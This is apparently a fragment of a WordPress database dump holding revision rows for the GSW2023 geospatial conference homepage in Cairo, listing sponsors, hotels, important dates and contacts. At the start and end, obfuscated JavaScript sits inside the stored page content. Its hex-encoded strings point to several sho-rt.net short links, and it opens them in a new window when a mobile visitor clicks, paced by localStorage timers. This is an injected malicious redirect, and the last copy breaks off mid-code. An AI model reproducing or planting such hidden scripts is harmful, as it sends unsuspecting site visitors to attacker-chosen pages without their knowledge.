_0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-06-13 21:31:33','2023-06-13 21:31:33','',3066,'https://gsw2023.com/?p=4683',0,'revision','',0),
(4684,1,'2023-06-13 21:37:00','2023-06-13 21:37:00','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685609158984{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 36pt;\">Prime Sponsor</span></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685609109195{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406603694{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406565735{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"http://hdmap.geomatics.ncku.edu.tw/index-US.php\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406679677{margin-top: 137px !important;}\"]<a href=\"www.applanix.com\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684969898333{margin-top: 5px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4500 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/HEXAGON_STANDARD_CMYK_LOGO-300x124.jpg\" alt=\"\" width=\"341\" height=\"141\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305185157{margin-top: 40px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684969841504{margin-top: 20px !important;}\"]<a href=\"www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345447550{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.giscon.de/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"wp-image-4597 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/giscon-300x222.jpg\" alt=\"\" width=\"255\" height=\"189\" /><br />\n</a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345389553{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"> </a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345510625{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681676234291{margin-top: 50px !important;}\"]<a href=\"http://www.geosat.com.tw\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406965583{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"http://www.riegl.com\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406157694{margin-top: 88px !important;}\"]<a href=\"http://www.robotlab.com.tw\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\n<p>[/vc_column_text][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/4\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1684377464605{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1685736118080{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"3/4\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1686350035719{margin-top: 190px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#686868\"][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1684379817578{margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffff00; font-size: 24pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"328\" height=\"185\" />Conference Venue </span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684379884193{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/2\" awb_type=\"image\"][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffff00;\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text][/vc_column_text][vc_row_inner][vc_column_inner][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3></h3>\n<h3></h3>\n<h3></h3>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><strong>-Camera ready paper submission: July 15, 2023</strong></h5>\n</li>\n</ul>\n<h5 style=\"text-align: center;\"></h5>\n<ul style=\"text-align: center;\">\n<li style=\"text-align: left;\">\n<h5><strong>-Deadline for submission of travel grants                                           funded by </strong><strong style=\"text-align: center;\">The ISPRS Foundation is: June 16, 2023</strong></h5>\n</li>\n</ul>\n<h5 style=\"text-align: center;\"></h5>\n<ul>\n<li style=\"text-align: left;\">\n<h5><strong>-Early bird registration deadline: July 1, 2023</strong></h5>\n</li>\n</ul>\n<p>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" button_alignment=\"btn_center\" css=\".vc_custom_1686689514453{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][vc_column][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]<strong>Payment of Registration is Opened Now</strong>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][vc_column_text]</p>\n<h2 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong>Invitation Letter</strong></span></h2>\n<p><span style=\"color: #ffffff;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></p>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\">Get Your Invitation letter</a></span></strong></h5>\n<p><span style=\"color: #ffffff;\"><strong> </strong></span></p>\n<p><span style=\"color: #ffffff;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></p>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\">GSW-visa@gsw2023.com</a><strong> .</strong></span></h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"180px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const 